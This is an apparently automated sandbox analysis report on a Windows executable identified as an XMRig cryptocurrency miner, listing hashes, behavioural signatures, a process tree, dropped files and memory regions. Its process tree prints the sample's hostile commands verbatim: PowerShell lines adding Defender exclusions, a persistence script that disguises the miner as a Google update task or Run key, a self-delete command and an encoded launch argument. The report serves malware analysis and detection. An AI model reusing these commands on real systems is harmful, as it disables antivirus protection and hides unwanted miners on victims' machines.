Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1297s
  • max time network
    1793s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 30 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1196
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\DLKFnAGYJBNTnxwq.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\DLKFnAGYJBNTnxwq.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2832
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2664
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2796
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:2532
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\DLKFnAGYJBNTnxwq.exe"
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:2612
        • C:\Windows\System32\choice.exe
          choice /C Y /N /D Y /T 3
          3⤵
            PID:268
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
          2⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2600
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
            3⤵
              PID:1168
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1528
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1420
            • C:\Windows\system32\schtasks.exe
              "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
              3⤵
              • Creates scheduled task(s)
              PID:2040
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:1444
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:1048
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic PATH Win32_VideoController GET Name, VideoProcessor
              3⤵
              • Detects videocard installed
              • Modifies data under HKEY_USERS
              • Suspicious use of AdjustPrivilegeToken
              PID:1664
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            PID:1952
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2356
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {54951AF1-46DC-46CA-BB24-8BDB40D0E366} S-1-5-18:NT AUTHORITY\System:Service:
          1⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1572
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2768

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          2.0MB

          MD5

          a16a669a09bf158058b83e04e69fe38e

          SHA1

          f6c94763850d9e590d86057139e8895a7aacdeea

          SHA256

          cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

          SHA512

          658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

        • C:\Program Files\Google\Libs\g.log
          Filesize

          198B

          MD5

          37dd19b2be4fa7635ad6a2f3238c4af1

          SHA1

          e5b2c034636b434faee84e82e3bce3a3d3561943

          SHA256

          8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

          SHA512

          86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          db7d77f8bb24d6e03e68acf3a635a79f

          SHA1

          53c3728dfcc1af43ca89250b11ced57dc7223c14

          SHA256

          319a3d6efff803f386b7376944320652c09b6ff99135659cebf3db689b57b7f6

          SHA512

          1eec12d010381ed3aea1d02ffd44dc0973a671e822d949564af19e148dc21bdddcecd3dc021001956f903cdced5372d4568cb03538fb819d8d0eaf57d89d3760

        • \??\PIPE\srvsvc
          MD5

          d41d8cd98f00b204e9800998ecf8427e

          SHA1

          da39a3ee5e6b4b0d3255bfef95601890afd80709

          SHA256

          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

          SHA512

          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

        • \Program Files\Google\Chrome\updater.exe
          Filesize

          180KB

          MD5

          268ec8e2014172f9f1fafd892a9dd264

          SHA1

          8f15390a858285dc85099a065f052b115d21f9ad

          SHA256

          2e6d69f9cd6e8c97d44652781472c63dc6b8284fca7777ad72081eac542dc67f

          SHA512

          4bfbc62fc123ff278423453bc23f2b45f495ff055c1a5b45e211e1f362cbd57020eb9932855b15e56b59afd603291fe21ca24335673bd081b9f21bcb39fa03e3

        • memory/1420-55-0x0000000000EA0000-0x0000000000F20000-memory.dmp
          Filesize

          512KB

        • memory/1420-56-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp
          Filesize

          9.6MB

        • memory/1420-58-0x0000000000EA0000-0x0000000000F20000-memory.dmp
          Filesize

          512KB

        • memory/1420-54-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp
          Filesize

          9.6MB

        • memory/1420-59-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp
          Filesize

          9.6MB

        • memory/1420-57-0x0000000000EA0000-0x0000000000F20000-memory.dmp
          Filesize

          512KB

        • memory/1444-72-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/1444-76-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/1528-52-0x0000000001310000-0x0000000001390000-memory.dmp
          Filesize

          512KB

        • memory/1528-50-0x000007FEF4DA0000-0x000007FEF573D000-memory.dmp
          Filesize

          9.6MB

        • memory/1528-49-0x0000000001310000-0x0000000001390000-memory.dmp
          Filesize

          512KB

        • memory/1528-48-0x000007FEF4DA0000-0x000007FEF573D000-memory.dmp
          Filesize

          9.6MB

        • memory/1528-51-0x0000000001310000-0x0000000001390000-memory.dmp
          Filesize

          512KB

        • memory/1528-53-0x000007FEF4DA0000-0x000007FEF573D000-memory.dmp
          Filesize

          9.6MB

        • memory/2356-88-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-98-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-130-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-128-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-126-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-124-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-122-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-120-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-118-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-116-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-114-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-112-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-110-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-108-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-106-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-104-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-102-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-100-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-96-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-94-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-92-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-90-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-86-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-84-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-82-0x0000000000BF0000-0x0000000000C10000-memory.dmp
          Filesize

          128KB

        • memory/2356-81-0x0000000000870000-0x0000000000890000-memory.dmp
          Filesize

          128KB

        • memory/2356-80-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-78-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-67-0x0000000000040000-0x0000000000060000-memory.dmp
          Filesize

          128KB

        • memory/2356-77-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-69-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-70-0x0000000000870000-0x0000000000890000-memory.dmp
          Filesize

          128KB

        • memory/2356-71-0x0000000000BF0000-0x0000000000C10000-memory.dmp
          Filesize

          128KB

        • memory/2356-75-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2356-73-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2600-38-0x0000000002630000-0x00000000026B0000-memory.dmp
          Filesize

          512KB

        • memory/2600-43-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp
          Filesize

          9.6MB

        • memory/2600-42-0x0000000002630000-0x00000000026B0000-memory.dmp
          Filesize

          512KB

        • memory/2600-41-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp
          Filesize

          9.6MB

        • memory/2600-40-0x0000000002630000-0x00000000026B0000-memory.dmp
          Filesize

          512KB

        • memory/2600-39-0x0000000002630000-0x00000000026B0000-memory.dmp
          Filesize

          512KB

        • memory/2600-37-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp
          Filesize

          9.6MB

        • memory/2664-8-0x0000000002610000-0x0000000002690000-memory.dmp
          Filesize

          512KB

        • memory/2664-11-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp
          Filesize

          9.6MB

        • memory/2664-10-0x0000000002610000-0x0000000002690000-memory.dmp
          Filesize

          512KB

        • memory/2664-12-0x0000000002610000-0x0000000002690000-memory.dmp
          Filesize

          512KB

        • memory/2664-13-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp
          Filesize

          9.6MB

        • memory/2664-9-0x0000000002610000-0x0000000002690000-memory.dmp
          Filesize

          512KB

        • memory/2664-6-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp
          Filesize

          9.6MB

        • memory/2664-7-0x00000000022D0000-0x00000000022D8000-memory.dmp
          Filesize

          32KB

        • memory/2664-5-0x000000001B1B0000-0x000000001B492000-memory.dmp
          Filesize

          2.9MB

        • memory/2768-47-0x000000013F020000-0x000000013F231000-memory.dmp
          Filesize

          2.1MB

        • memory/2768-68-0x000000013F020000-0x000000013F231000-memory.dmp
          Filesize

          2.1MB

        • memory/2768-65-0x000000013F020000-0x000000013F231000-memory.dmp
          Filesize

          2.1MB

        • memory/2796-28-0x000007FEF4DA0000-0x000007FEF573D000-memory.dmp
          Filesize

          9.6MB

        • memory/2796-24-0x00000000027B0000-0x0000000002830000-memory.dmp
          Filesize

          512KB

        • memory/2796-25-0x00000000027B0000-0x0000000002830000-memory.dmp
          Filesize

          512KB

        • memory/2796-23-0x000007FEF4DA0000-0x000007FEF573D000-memory.dmp
          Filesize

          9.6MB

        • memory/2796-20-0x000007FEF4DA0000-0x000007FEF573D000-memory.dmp
          Filesize

          9.6MB

        • memory/2796-22-0x00000000027B0000-0x0000000002830000-memory.dmp
          Filesize

          512KB

        • memory/2796-21-0x0000000001F10000-0x0000000001F18000-memory.dmp
          Filesize

          32KB

        • memory/2796-19-0x000000001B240000-0x000000001B522000-memory.dmp
          Filesize

          2.9MB

        • memory/2796-27-0x00000000027B0000-0x0000000002830000-memory.dmp
          Filesize

          512KB

        • memory/2832-26-0x000000013F300000-0x000000013F511000-memory.dmp
          Filesize

          2.1MB

        • memory/2832-0-0x000000013F300000-0x000000013F511000-memory.dmp
          Filesize

          2.1MB

        • memory/2832-30-0x000000013F300000-0x000000013F511000-memory.dmp
          Filesize

          2.1MB